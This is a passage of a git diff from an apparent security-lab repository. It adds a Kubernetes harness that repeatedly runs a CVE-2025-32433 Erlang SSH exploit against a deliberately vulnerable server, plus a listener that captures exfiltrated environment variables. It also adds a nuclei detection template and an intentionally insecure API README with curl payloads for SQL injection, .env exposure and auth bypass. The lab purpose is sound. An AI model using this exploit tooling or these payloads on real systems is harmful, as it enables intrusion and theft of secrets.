response: {e}") + +except Exception as e: + print(f"[!] Error: {e}") + print("[!] Stack trace:") + import traceback + traceback.print_exc() diff --git a/exploits/CVE-2025-32433/ssh_exploit/deploy.sh b/exploits/CVE-2025-32433/ssh_exploit/deploy.sh new file mode 100755 index 0000000..95d94ba --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_exploit/deploy.sh @@ -0,0 +1,22 @@ +#!/bin/bash + +# Exit on error +set -e + +## Build the Docker image +#echo "Building SSH exploit Docker image..." +#docker build -t confusedcrib/ssh-exploit:latest -f exploit.Dockerfile . +# +## Push the Docker image +#echo "Pushing SSH exploit Docker image..." +#docker push confusedcrib/ssh-exploit:latest + +# Delete existing pod to force restart +echo "Deleting existing pod to force restart..." +kubectl delete pod -l app=ssh-exploit --force --grace-period=0 -n erlang || true + +# Deploy to Kubernetes +echo "Deploying SSH exploit to Kubernetes..." +kubectl apply -f exploit-deployment.yaml -n erlang + +echo "Deployment complete! Check the status with: kubectl get pods -l app=ssh-exploit" \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_exploit/exploit-deployment.yaml b/exploits/CVE-2025-32433/ssh_exploit/exploit-deployment.yaml new file mode 100644 index 0000000..ed40798 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_exploit/exploit-deployment.yaml @@ -0,0 +1,99 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: Role +metadata: + name: ssh-exploit-role + namespace: erlang +rules: +- apiGroups: [""] + resources: ["services", "pods"] + verbs: ["get", "list"] +--- +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: ssh-exploit-rolebinding + namespace: erlang +subjects: +- kind: ServiceAccount + name: ssh-exploit + namespace: erlang +roleRef: + kind: Role + name: ssh-exploit-role + apiGroup: rbac.authorization.k8s.io +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: ssh-exploit + namespace: erlang +--- +apiVersion: v1 +kind: Service +metadata: + name: ssh-exploit-listener + namespace: erlang +spec: + selector: + app: ssh-exploit + ports: + - port: 8080 + targetPort: 8080 + protocol: TCP + type: ClusterIP +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: ssh-exploit + namespace: erlang + labels: + app: ssh-exploit +spec: + replicas: 1 + selector: + matchLabels: + app: ssh-exploit + template: + metadata: + labels: + app: ssh-exploit + spec: + serviceAccountName: ssh-exploit + containers: + - name: exploit + image: confusedcrib/ssh-exploit:latest + imagePullPolicy: Always + env: + - name: POD_NAMESPACE + valueFrom: + fieldRef: + fieldPath: metadata.namespace + - name: POD_IP + valueFrom: + fieldRef: + fieldPath: status.podIP + - name: HOST + value: "ssh-server.erlang.svc.cluster.local" + - name: PORT + value: "2222" + - name: CALLBACK_HOST + valueFrom: + fieldRef: + fieldPath: status.podIP + - name: CALLBACK_PORT + value: "8080" + ports: + - containerPort: 8080 + name: listener + command: ["/bin/sh", "-c"] + args: ["python listener.py & while true; do python CVE-2025-32433.py; echo 'Waiting for next hourly execution...'; sleep 3600; done"] + readinessProbe: + exec: + command: + - nc + - -zv + - ssh-server.erlang.svc.cluster.local + - "2222" + initialDelaySeconds: 5 + periodSeconds: 5 \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_exploit/exploit.Dockerfile b/exploits/CVE-2025-32433/ssh_exploit/exploit.Dockerfile new file mode 100644 index 0000000..f38fb2f --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_exploit/exploit.Dockerfile @@ -0,0 +1,18 @@ +FROM python:3.9-slim + +# Install required packages +RUN pip install kubernetes requests + +# Create directory for captured data +RUN mkdir -p /app/captured_data + +# Copy exploit files +COPY CVE-2025-32433.py /app/ +COPY listener.py /app/ +WORKDIR /app + +# Make scripts executable +RUN chmod +x /app/CVE-2025-32433.py /app/listener.py + +# Default command - this will be overridden by the args in the deployment YAML +CMD ["bash", "-c", "python listener.py & python CVE-2025-32433.py"] \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_exploit/listener.py b/exploits/CVE-2025-32433/ssh_exploit/listener.py new file mode 100644 index 0000000..ae4dc93 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_exploit/listener.py @@ -0,0 +1,127 @@ +#!/usr/bin/env python3 +import socket +import time +import os +import argparse +import threading +import datetime + +class EnvVarListener: + def __init__(self, host='0.0.0.0', port=8080): + self.host = host + self.port = port + self.sock = None + self.connections = [] + self.running = False + self.data_dir = "captured_data" + + # Create data directory if it doesn't exist + if not os.path.exists(self.data_dir): + os.makedirs(self.data_dir) + + def handle_client(self, client_socket, addr): + print(f"[+] Connection from {addr[0]}:{addr[1]}") + + # Timestamp for the filename + timestamp = datetime.datetime.now().strftime("%Y%m%d_%H%M%S") + filename = f"{self.data_dir}/env_vars_{addr[0]}_{timestamp}.txt" + + # Receive data with a timeout + client_socket.settimeout(30) + data = b"" + try: + while True: + chunk = client_socket.recv(4096) + if not chunk: + break + data += chunk + except socket.timeout: + print(f"[!] Receive timeout from {addr[0]}:{addr[1]}") + except Exception as e: + print(f"[!] Error receiving data from {addr[0]}:{addr[1]}: {e}") + + # Save received data to file + try: + if data: + with open(filename, 'wb') as f: + f.write(data) + print(f"[+] Saved {len(data)} bytes to {filename}") + + # Also print the data to console + try: + print("\n--- BEGIN RECEIVED DATA ---") + print(data.decode('utf-8', errors='replace')) + print("--- END RECEIVED DATA ---\n") + except Exception as e: + print(f"[!] Error decoding data: {e}") + else: + print(f"[!] No data received from {addr[0]}:{addr[1]}") + except Exception as e: + print(f"[!] Error saving data: {e}") + + # Close the connection + client_socket.close() + + def start(self): + try: + self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + self.sock.bind((self.host, self.port)) + self.sock.listen(5) + self.running = True + + print(f"[*] Listener started on {self.host}:{self.port}") + print(f"[*] Saving captured data to {os.path.abspath(self.data_dir)}") + + while self.running: + try: + client, addr = self.sock.accept() + client_handler = threading.Thread( + target=self.handle_client, + args=(client, addr) + ) + client_handler.daemon = True + client_handler.start() + self.connections.append(client_handler) + except Exception as e: + if self.running: + print(f"[!] Error accepting connection: {e}") + break + + except Exception as e: + print(f"[!] Error starting listener: {e}") + finally: + self.stop() + + def stop(self): + self.running = False + if self.sock: + try: + self.sock.close() + except: + pass + print("[*] Listener stopped") + +def main(): + parser = argparse.ArgumentParser(description="Environment Variable Exfiltration Listener") + parser.add_argument("--host", default="0.0.0.0", help="Host to listen on (default: 0.0.0.0)") + parser.add_argument("--port", type=int, default=8080, help="Port to listen on (default: 8080)") + args = parser.parse_args() + + print(""" + ✧・゚: *✧・゚:* 𝐄𝐧𝐯𝐢𝐫𝐨𝐧𝐦𝐞𝐧𝐭 𝐕𝐚𝐫𝐢𝐚𝐛𝐥𝐞 𝐋𝐢𝐬𝐭𝐞𝐧𝐞𝐫 *:・゚✧*:・゚✧ + + For CVE-2025-32433 SSH Pre-Auth RCE Exploit + """) + + listener = EnvVarListener(args.host, args.port) + + try: + listener.start() + except KeyboardInterrupt: + print("\n[*] Keyboard interrupt detected. Shutting down...") + finally: + listener.stop() + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_server/Dockerfile b/exploits/CVE-2025-32433/ssh_server/Dockerfile new file mode 100644 index 0000000..729d6d3 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_server/Dockerfile @@ -0,0 +1,31 @@ +FROM debian:bookworm + +WORKDIR /build + +RUN apt-get update && apt-get install -y \ + git build-essential libssl-dev autoconf libncurses5-dev \ + libgl1-mesa-dev libglu1-mesa-dev libpng-dev \ + libssh-dev libxml2-utils xsltproc fop wget curl \ + openssh-client + +# Clone and build Erlang/OTP 26.2.5.11 +RUN git clone https://github.com/erlang/otp.git && \ + cd otp && \ + git checkout OTP-26.2.5.10 && \ + ./configure --prefix=/usr && \ + make -j$(nproc) && \ + make install + +WORKDIR /root + +COPY ssh_server.erl . +RUN erlc ssh_server.erl + +# Generate RSA key in PEM format that Erlang understands +RUN mkdir -p /root/ssh_keys && \ + ssh-keygen -m PEM -t rsa -b 2048 -f /root/ssh_keys/ssh_host_rsa_key -N "" && \ + ssh-keygen -y -f /root/ssh_keys/ssh_host_rsa_key > /root/ssh_keys/ssh_host_rsa_key.pub + +EXPOSE 2222 + +CMD ["erl", "-noshell", "-pa", ".", "-s", "ssh_server", "start"] \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_server/deploy.sh b/exploits/CVE-2025-32433/ssh_server/deploy.sh new file mode 100755 index 0000000..d0aa4c6 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_server/deploy.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +# Build the Docker image +#docker build -t confusedcrib/erlang-server:latest . +# +## Push the Docker image +#docker push confusedcrib/erlang-server:latest + +# Apply the Kubernetes deployment +kubectl apply -f ssh-server-deployment.yaml -n erlang + +echo "SSH server deployed successfully in the erlang namespace!" +echo "You can connect to the server using:" +echo "kubectl port-forward service/ssh-server 2222:22 -n erlang" \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_server/ssh-server-deployment.yaml b/exploits/CVE-2025-32433/ssh_server/ssh-server-deployment.yaml new file mode 100644 index 0000000..ffc3f5d --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_server/ssh-server-deployment.yaml @@ -0,0 +1,53 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + name: ssh-server + namespace: erlang + labels: + app: ssh-server +spec: + replicas: 1 + selector: + matchLabels: + app: ssh-server + template: + metadata: + labels: + app: ssh-server + spec: + containers: + - name: ssh-server + image: confusedcrib/erlang-server:latest + imagePullPolicy: Always + ports: + - containerPort: 2222 + name: ssh + resources: + limits: + cpu: "500m" + memory: "256Mi" + requests: + cpu: "100m" + memory: "128Mi" + securityContext: + allowPrivilegeEscalation: false + runAsNonRoot: false + runAsUser: 0 + capabilities: + drop: + - ALL +--- +apiVersion: v1 +kind: Service +metadata: + name: ssh-server + namespace: erlang +spec: + type: ClusterIP + ports: + - port: 2222 + targetPort: 2222 + protocol: TCP + name: ssh + selector: + app: ssh-server \ No newline at end of file diff --git a/exploits/CVE-2025-32433/ssh_server/ssh_server.erl b/exploits/CVE-2025-32433/ssh_server/ssh_server.erl new file mode 100644 index 0000000..73803c2 --- /dev/null +++ b/exploits/CVE-2025-32433/ssh_server/ssh_server.erl @@ -0,0 +1,19 @@ +-module(ssh_server). +-export([start/0]). + +start() -> + io:format("Starting vulnerable SSH server~n"), + application:ensure_all_started(ssh), + case ssh:daemon(2222, [ + {system_dir, "/root/ssh_keys"}, + {auth_methods, "password"}, + {pwdfun, fun(User, Pass) -> + io:format("Login attempt ~p/~p~n", [User, Pass]), + false + end} + ]) of + {ok, Pid} -> + io:format("SSH Daemon started successfully. Pid: ~p~n", [Pid]); + {error, Reason} -> + io:format("Failed to start SSH daemon: ~p~n", [Reason]) + end. \ No newline at end of file diff --git a/exploits/admission-review.json b/exploits/admission-review.json new file mode 100644 index 0000000..351721b --- /dev/null +++ b/exploits/admission-review.json @@ -0,0 +1,46 @@ +{ + "apiVersion": "admission.k8s.io/v1", + "kind": "AdmissionReview", + "request": { + "kind": { + "group": "networking.k8s.io", + "version": "v1", + "kind": "Ingress" + }, + "resource": { + "group": "", + "version": "v1", + "resource": "namespaces" + }, + "operation": "CREATE", + "object": { + "metadata": { + "name": "example-ingress" + }, + "spec": { + "ingressClassName": "nginx", + "rules": [ + { + "host": "foo.com", + "http": { + "paths": [ + { + "path": "/", + "pathType": "Prefix", + "backend": { + "service": { + "name": "kubernetes", + "port": { + "number": 80 + } + } + } + } + ] + } + } + ] + } + } + } + } \ No newline at end of file diff --git a/exploits/nuclei-ingess.yaml b/exploits/nuclei-ingess.yaml new file mode 100644 index 0000000..01d63bb --- /dev/null +++ b/exploits/nuclei-ingess.yaml @@ -0,0 +1,37 @@ +id: exposed-ingress-nginx-admission + +info: + name: Publicly exposed Ingress NGINX Admission + author: Wiz research + severity: high + description: Ingress Nginx admission controller endpoint should not be exposed + metadata: + max-request: 1 + tags: ssl,tls + +ssl: + - address: "{{Host}}:{{Port}}" + + matchers: + - type: dsl + dsl: + - 'contains(issuer_org, "nil1")' + - 'contains(subject_org, "nil2")' + - 'contains(subject_an, "nginx")' + condition: and + + extractors: + - type: json + name: issuer_org + json: + - ".issuer_org[0]" + + - type: json + name: subject_org + json: + - ".subject_org[0]" + + - type: json + name: subject_an + json: + - ".subject_an[0]" \ No newline at end of file diff --git a/insecure-ai/Dockerfile b/insecure-ai/Dockerfile new file mode 100644 index 0000000..b164ee0 --- /dev/null +++ b/insecure-ai/Dockerfile @@ -0,0 +1,26 @@ +FROM python:3.12-slim + +WORKDIR /app + +# Install system dependencies +RUN apt-get update && apt-get install -y \ + build-essential \ + graphviz \ + && rm -rf /var/lib/apt/lists/* + +# Copy requirements first to leverage Docker cache +COPY requirements.txt . +RUN pip install --no-cache-dir -r requirements.txt gunicorn + +# Copy the rest of the application +COPY . . + +# Expose the port the app runs on +EXPOSE 5000 + +# Set environment variables +ENV FLASK_APP=app.py +ENV FLASK_ENV=production + +# Run the application with gunicorn +CMD ["gunicorn", "--bind", "0.0.0.0:5000", "--workers", "4", "--timeout", "120", "--config", "python:app", "app:app"] \ No newline at end of file diff --git a/insecure-ai/README.md b/insecure-ai/README.md new file mode 100644 index 0000000..8cf25da --- /dev/null +++ b/insecure-ai/README.md @@ -0,0 +1,52 @@ +# Code Security Analyzer + +A Flask web application that allows users to analyze their code for security issues using the `latio` package. + +## Features + +- Paste code directly into the web interface +- Upload code as a ZIP file +- Real-time code analysis using `latio` +- Modern, responsive UI with syntax highlighting + +## Prerequisites + +- Python 3.7 or higher +- pip (Python package manager) +- `latio` package installed globally + +## Installation + +1. Clone this repository or download the files +2. Create a virtual environment (recommended): + ```bash + python -m venv venv + source venv/bin/activate # On Windows: venv\Scripts\activate + ``` +3. Install the required packages: + ```bash + pip install -r requirements.txt + ``` + +## Usage + +1. Start the Flask application: + ```bash + python app.py + ``` +2. Open your web browser and navigate to `http://localhost:5000` +3. Either paste your code into the text editor or upload a ZIP file containing your code +4. Click "Analyze Code" to run the security analysis +5. View the results in the results section below + +## Security Considerations + +- The application uses temporary directories for file processing +- File uploads are limited to 16MB +- Only ZIP files are accepted for upload +- All uploaded files are processed in isolated temporary directories +- The application runs in debug mode for development purposes + +## License + +MIT License \ No newline at end of file diff --git a/insecure-ai/app.py b/insecure-ai/app.py new file mode 100644 index 0000000..4e4efce --- /dev/null +++ b/insecure-ai/app.py @@ -0,0 +1,306 @@ +import os +import tempfile +import zipfile +from flask import Flask, request, render_template, jsonify, url_for +from werkzeug.utils import secure_filename +import shutil +import threading +import time +import logging +import sys +import asyncio +from latio.core import full_agent_scan, partial_agent_scan +import markdown +import traceback +import gunicorn.app.base + +# Set up logging before anything else +def setup_logging(): + try: + # Create logs directory if it doesn't exist + os.makedirs('/app/logs', exist_ok=True) + + # Configure root logger + root_logger = logging.getLogger() + root_logger.setLevel(logging.DEBUG) + + # Remove any existing handlers + for handler in root_logger.handlers[:]: + root_logger.removeHandler(handler) + + # Create formatters + formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') + + # Console handler + console_handler = logging.StreamHandler(sys.stdout) + console_handler.setFormatter(formatter) + root_logger.addHandler(console_handler) + + # File handler + file_handler = logging.FileHandler('/app/logs/app.log') + file_handler.setFormatter(formatter) + root_logger.addHandler(file_handler) + + # Set up specific logger for our app + logger = logging.getLogger(__name__) + logger.setLevel(logging.DEBUG) + + logger.info("Logging setup completed successfully") + return logger + except Exception as e: + print(f"Error setting up logging: {str(e)}", file=sys.stderr) + raise + +# Initialize logging +logger = setup_logging() + +# Add a custom exception handler for unhandled exceptions +def handle_exception(exc_type, exc_value, exc_traceback): + if issubclass(exc_type, KeyboardInterrupt): + sys.__excepthook__(exc_type, exc_value, exc_traceback) + else: + logger.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback)) +sys.excepthook = handle_exception + +app = Flask(__name__) +app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # 16MB max file size +app.config['UPLOAD_FOLDER'] = tempfile.gettempdir() +app.config['APPLICATION_ROOT'] = '/ai' + +# Configure url_for to use the correct prefix +def url_for_external(*args, **kwargs): + url = url_for(*args, **kwargs) + if app.config['APPLICATION_ROOT']: + url = app.config['APPLICATION_ROOT'] + url + return url + +app.jinja_env.globals['url_for'] = url_for_external + +# Gunicorn configuration +class GunicornConfig: + def __init__(self): + self.bind = "0.0.0.0:5000" + self.workers = 4 + self.timeout = 120 + self.script_name = '/ai' + +# Create gunicorn config object +gunicorn_config = GunicornConfig() + +# Add error handler for Flask +@app.errorhandler(Exception) +def handle_error(error): + error_msg = f"Flask error: {str(error)}\n{traceback.format_exc()}" + logger.error(error_msg) + return jsonify({'error': error_msg}), 500 + +# Add request logging middleware +@app.before_request +def log_request_info(): + logger.info('Request received: %s %s', request.method, request.url) + logger.debug('Headers: %s', dict(request.headers)) + logger.debug('Form data: %s', dict(request.form)) + logger.debug('Files: %s', dict(request.files)) + logger.debug('Body: %s', request.get_data()) + +@app.after_request +def log_response_info(response): + logger.debug('Response status: %s', response.status) + logger.debug('Response headers: %s', dict(response.headers)) + logger.debug('Response body: %s', response.get_data()) + return response + +# Add error logging for unhandled exceptions in threads +def thread_exception_handler(args): + logger.error("Unhandled exception in thread: %s", args.exc_value, exc_info=(args.exc_type, args.exc_value, args.exc_traceback)) +threading.excepthook = thread_exception_handler + +ALLOWED_EXTENSIONS = {'zip'} + +# Store analysis results +analysis_results = {} +analysis_status = {} + +def allowed_file(filename): + return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS + +async def analyze_directory(directory, analysis_id): + try: + analysis_status[analysis_id] = "running" + logger.info(f"Starting analysis in directory: {directory}") + + # Check if directory exists and is accessible + if not os.path.exists(directory): + error_msg = f"Directory {directory} does not exist" + logger.error(error_msg) + raise Exception(error_msg) + + # Log directory contents + try: + dir_contents = os.listdir(directory) + logger.info(f"Directory contents: {dir_contents}") + except Exception as e: + logger.warning(f"Could not list directory contents: {e}") + + # Run the analysis using full_agent_scan + try: + logger.info("Starting full_agent_scan...") + result = await full_agent_scan(directory, model='gpt-4o') + logger.info("full_agent_scan completed successfully") + except Exception as e: + error_msg = f"Error during full_agent_scan: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + raise Exception(error_msg) + + # Convert the result to a markdown string + if isinstance(result, list): + # Format each item as a markdown section + result_str = "\n\n".join(f"## {item['title']}\n\n{item['description']}" for item in result) + else: + result_str = str(result) + + logger.info(f"Analysis completed successfully") + analysis_results[analysis_id] = result_str + analysis_status[analysis_id] = "completed" + except Exception as e: + error_msg = f"Unexpected error: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + analysis_results[analysis_id] = error_msg + analysis_status[analysis_id] = "error" + finally: + # Clean up the temporary directory + try: + if os.path.exists(directory): + shutil.rmtree(directory) + logger.info(f"Cleaned up temporary directory: {directory}") + except Exception as e: + logger.warning(f"Failed to clean up temporary directory: {e}") + +def run_async_analysis(directory, analysis_id): + try: + logger.info(f"Starting async analysis for ID: {analysis_id}") + asyncio.run(analyze_directory(directory, analysis_id)) + except Exception as e: + error_msg = f"Error in async analysis thread: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + analysis_results[analysis_id] = error_msg + analysis_status[analysis_id] = "error" + +@app.route('/') +def index(): + logger.info("Serving index page") + return render_template('index.html', url_for=url_for_external) + +@app.route('/analyze', methods=['POST']) +def analyze(): + analysis_id = str(time.time()) + analysis_status[analysis_id] = "starting" + + try: + logger.info(f"Received analyze request with ID: {analysis_id}") + logger.debug(f"Request form data: {request.form}") + logger.debug(f"Request files: {request.files}") + + if 'code' in request.form: + # Create a temporary directory for the code + temp_dir = tempfile.mkdtemp() + logger.info(f"Created temporary directory: {temp_dir}") + try: + # Write the code to a file + code_file = os.path.join(temp_dir, 'code.py') + with open(code_file, 'w') as f: + f.write(request.form['code']) + logger.info(f"Wrote code to {code_file}") + + # Start analysis in a separate thread + thread = threading.Thread(target=run_async_analysis, args=(temp_dir, analysis_id)) + thread.start() + logger.info(f"Started analysis thread for ID: {analysis_id}") + + return jsonify({'analysis_id': analysis_id}) + except Exception as e: + error_msg = f"Error processing code: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + return jsonify({'error': error_msg}), 500 + + elif 'file' in request.files: + file = request.files['file'] + if file.filename == '': + return jsonify({'error': 'No file selected'}), 400 + + if file and allowed_file(file.filename): + # Create a temporary directory for the uploaded files + temp_dir = tempfile.mkdtemp() + logger.info(f"Created temporary directory: {temp_dir}") + try: + # Save the uploaded file + filename = secure_filename(file.filename) + filepath = os.path.join(temp_dir, filename) + file.save(filepath) + logger.info(f"Saved uploaded file to: {filepath}") + + # Extract the zip file + with zipfile.ZipFile(filepath, 'r') as zip_ref: + zip_ref.extractall(temp_dir) + logger.info("Extracted zip file contents") + + # Start analysis in a separate thread + thread = threading.Thread(target=run_async_analysis, args=(temp_dir, analysis_id)) + thread.start() + logger.info(f"Started analysis thread for ID: {analysis_id}") + + return jsonify({'analysis_id': analysis_id}) + except Exception as e: + error_msg = f"Error processing file: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + return jsonify({'error': error_msg}), 500 + + return jsonify({'error': 'Invalid file type'}), 400 + + return jsonify({'error': 'No code or file provided'}), 400 + except Exception as e: + error_msg = f"Unexpected error in analyze endpoint: {str(e)}\n{traceback.format_exc()}" + logger.error(error_msg) + return jsonify({'error': error_msg}), 500 + +@app.route('/status/') +def get_status(analysis_id): + logger.debug(f"Status check for analysis ID: {analysis_id}") + if analysis_id not in analysis_status: + logger.warning(f"Analysis ID not found: {analysis_id}") + return jsonify({'error': 'Analysis ID not found'}), 404 + + status = analysis_status[analysis_id] + result = analysis_results.get(analysis_id) if status in ['completed', 'error'] else None + + logger.debug(f"Status for {analysis_id}: {status}") + return jsonify({ + 'status': status, + 'result': result + }) + +@app.route('/view/') +def view_result(analysis_id): + logger.debug(f"View request for analysis ID: {analysis_id}") + if analysis_id not in analysis_status: + logger.warning(f"Analysis ID not found: {analysis_id}") + return "Analysis not found", 404 + + status = analysis_status[analysis_id] + if status not in ['completed', 'error']: + logger.info(f"Analysis {analysis_id} is still running") + return "Analysis is still running", 400 + + result = analysis_results.get(analysis_id) + if not result: + logger.warning(f"No results available for analysis ID: {analysis_id}") + return "No results available", 404 + + # Convert markdown to HTML + html_content = markdown.markdown(result, extensions=['fenced_code', 'tables']) + + return render_template('view.html', content=html_content) + +if __name__ == '__main__': + logger.info("Starting Flask application") + app.run(host='0.0.0.0', port=5000, debug=True) \ No newline at end of file diff --git a/insecure-ai/requirements.txt b/insecure-ai/requirements.txt new file mode 100644 index 0000000..2fb709b --- /dev/null +++ b/insecure-ai/requirements.txt @@ -0,0 +1,8 @@ +flask==3.0.2 +latio==1.2.5 +python-magic==0.4.27 +Werkzeug==3.0.1 +markdown==3.5.2 +graphviz==0.20.1 +gunicorn==23.0.0 +openai>=1.0.0 \ No newline at end of file diff --git a/insecure-ai/templates/index.html b/insecure-ai/templates/index.html new file mode 100644 index 0000000..07d5fcb --- /dev/null +++ b/insecure-ai/templates/index.html @@ -0,0 +1,223 @@ + + + + + + Code Security Analyzer + + + + + + + + + + + + +
+

Code Security Analyzer

+ +
+

Analyze Your Code

+ +
+ + +
+ +
+ + +
+ + +
+ + + + +
+ + + + \ No newline at end of file diff --git a/insecure-ai/templates/view.html b/insecure-ai/templates/view.html new file mode 100644 index 0000000..9810a7b --- /dev/null +++ b/insecure-ai/templates/view.html @@ -0,0 +1,81 @@ + + + + + + Analysis Results + + + + + + + + + +
+ {{ content | safe }} +
+ + + + \ No newline at end of file diff --git a/insecure-api/Dockerfile b/insecure-api/Dockerfile new file mode 100644 index 0000000..f227f47 --- /dev/null +++ b/insecure-api/Dockerfile @@ -0,0 +1,24 @@ +# Use an official Python runtime as a parent image +FROM python:3.9-slim + +# Set the working directory in the container +WORKDIR /app + +# Copy only the requirements.txt first +COPY requirements.txt /app/requirements.txt + +# Install dependencies +RUN pip install --no-cache-dir --upgrade pip \ + && pip install --no-cache-dir -r requirements.txt + +# Then copy the rest of the application +COPY . /app + +# Expose port 8000 for the app to run on +EXPOSE 8000 + +# Define environment variable +ENV PYTHONUNBUFFERED=1 + +# Run the command to start Uvicorn +CMD ["uvicorn", "main:app", "--host", "0.0.0.0", "--port", "8000"] diff --git a/insecure-api/README b/insecure-api/README new file mode 100644 index 0000000..dda32e1 --- /dev/null +++ b/insecure-api/README @@ -0,0 +1,280 @@ +# **Intentionally Insecure Video Game API** + +This project is an intentionally insecure API designed for educational purposes to demonstrate common security vulnerabilities as outlined in the OWASP Top 10 for APIs. The API provides information about video games and includes administrative functions that are vulnerable to various security flaws. + +--- + +## **Table of Contents** + +* Features +* Prerequisites +* Setup and Installation +* Running the API +* API Endpoints +* Testing Security Issues + * Vulnerability 1: Broken Object Level Authorization + * Vulnerability 2: Broken Authentication + * Vulnerability 3: Excessive Data Exposure + * Vulnerability 4: Security Misconfiguration + * Vulnerability 5: Lack of Rate Limiting +* Example CURL Commands +* Disclaimer + +--- + +## **Features** + +* **Public Access:** + * Retrieve basic information about video games (developer, publisher, year published). +* **Authentication (Insecure):** + * Access sensitive sales data for video games. + * Administrative functions to add new video games (requires admin token). +* **Intentionally Insecure Aspects:** + * Exposes vulnerabilities from the OWASP Top 10 for APIs. + * Comments in the code indicate where vulnerabilities are present. + +--- + +## **Prerequisites** + +* **Python 3.7+** +* **pip package manager** + +--- + +## **Setup and Installation** + +### **1\. Clone the Repository** + +``` +git clone https://github.com/yourusername/insecure-api.git +cd insecure-api +``` + +### **2\. Create a Virtual Environment** + +``` +# Create virtual environment +python -m venv venv +# Activate virtual environment +# On Windows: +venv\Scripts\activate +# On Unix or MacOS +source venv/bin/activate +``` + +### **3\. Install Dependencies** + +``` +pip install -r requirements.txt + +*If requirements.txt is not present, install directly:* + +pip install fastapi uvicorn +``` +--- + +## **Running the API** + +Start the API server using Uvicorn: + +`uvicorn main:app --reload` + +* **Note:** The `--reload` flag enables auto-reloading of the server on code changes, but it is not recommended for production environments. + +--- + +## **API Endpoints** + +### **Public Endpoints** + +* **GET** `/games` + Retrieve a list of video games with basic information. +* **GET** `/docs` + OpenAPI docs + +### **Protected Endpoints (Insecure Authentication)** + +* **GET** `/games/{game_id}/sales` + Retrieve sales data for a specific game (no authentication required). +* **POST** `/games` + Add a new video game to the database (requires admin token). +* **GET** `/users` + Retrieve user information, including tokens and admin status. + +--- + +## **Testing Security Issues** + +Below are some of the security vulnerabilities present in the API and how to test them. + +### **Vulnerability 1: Broken Object Level Authorization** + +**Issue:** The goal of this app is that someone needs to buy a paid account in order to access sales data. We don't actually check for the login before presenting that data. This is important because it's something scanners can't check for without application context! + +**Endpoint:** `GET /games/{game_id}/sales` + +**Testing:** + +`curl -X GET "http://127.0.0.1:8000/games/1/sales"` + +--- + +### **Vulnerability 2: Broken Authentication** + +**Issue:** Uses a static header to determine if a user is allowed to create a game or not + +**Endpoint:** `POST /games` + +**Testing:** + +**Without Token:** +``` +curl -X POST "http://127.0.0.1:8000/games" \ + -H "Content-Type: application/json" \ + -d '{"id":151,"title":"New Game","developer":"Dev","publisher":"Pub","year_published":2024,"sales":0}' +``` + +**With User Token (Non-Admin):** +``` +curl -X POST "http://127.0.0.1:8000/games" \ + -H "Content-Type: application/json" \ + -H "token: user1token" \ + -d '{"id":151,"title":"New Game","developer":"Dev","publisher":"Pub","year_published":2024,"sales":0}' +``` + +**With Admin Token:** +``` +curl -X POST "http://127.0.0.1:8000/games" \ + -H "Content-Type: application/json" \ + -H "token: admintoken" \ + -d '{"id":151,"title":"New Game","developer":"Dev","publisher":"Pub","year_published":2024,"sales":0}' +``` +--- + +### **Vulnerability 3: Excessive Data Exposure** + +**Issue:** Returns the entire user list, including tokens and admin status. + +**Endpoint:** `GET /users` + +**Testing:** + +`curl -X GET "http://127.0.0.1:8000/users"` + +--- + +### **Vulnerability 4: Security Misconfiguration** + +**Issue:** The API runs with debug mode enabled and does not enforce HTTPS. + +* The API is accessible via HTTP, allowing potential interception of data. +* The OpenAPI documentation is exposed at `/docs`. + +**Testing:** + +Access the API documentation: +`Open a browser and navigate to http://127.0.0.1:8000/docs` + +* + +--- + +### **Vulnerability 5: Lack of Rate Limiting** + +**Issue:** No rate limiting is implemented, making the API susceptible to brute-force attacks. + +**Testing:** + +Perform multiple rapid requests to an endpoint: +``` +for i in {1..100}; do + curl -X GET "http://127.0.0.1:8000/games/1/sales" +done +``` +--- + +### **Vulnerability 6: Mass Assignment** + +**Endpoint: `/games/{game_id}`** + +**Issue:** Allows updating fields that should be immutable or restricted + +**Example CURL Command:** +``` +curl -X PUT "http://127.0.0.1:8000/games/1" \ +-H "Content-Type: application/json" \ +-d '{"id":1,"title":"Hacked Game","developer":"Bad Dev","publisher":"Bad Pub","year_published":2024,"sales":9999999}' +``` + +### **Vulnerability 7: SQL Injection** + +**Endpoint: `/search`** + +**Issue:** Unsanitized input could lead to injection attacks. + +`curl -X GET "http://127.0.0.1:8000/search?query=%27%20OR%20%271%27%3D%271%27%20--%20"` + +### **Vulnerability 8.: Improper Assets Management** + +**Endpoint: `/.env`** + +**Issue:** Exposes sensitive configuration files. + +**Example CURL Command:** + +`curl -X GET "http://127.0.0.1:8000/.env"` + +### **Vulnerability 9: Insufficient Logging & Monitoring** + +**Endpoint: `/admin/delete_game`** + +**Issue:** Administrative actions are not logged. +``` +curl -X POST "http://127.0.0.1:8000/admin/delete_game" \ +-H "token: 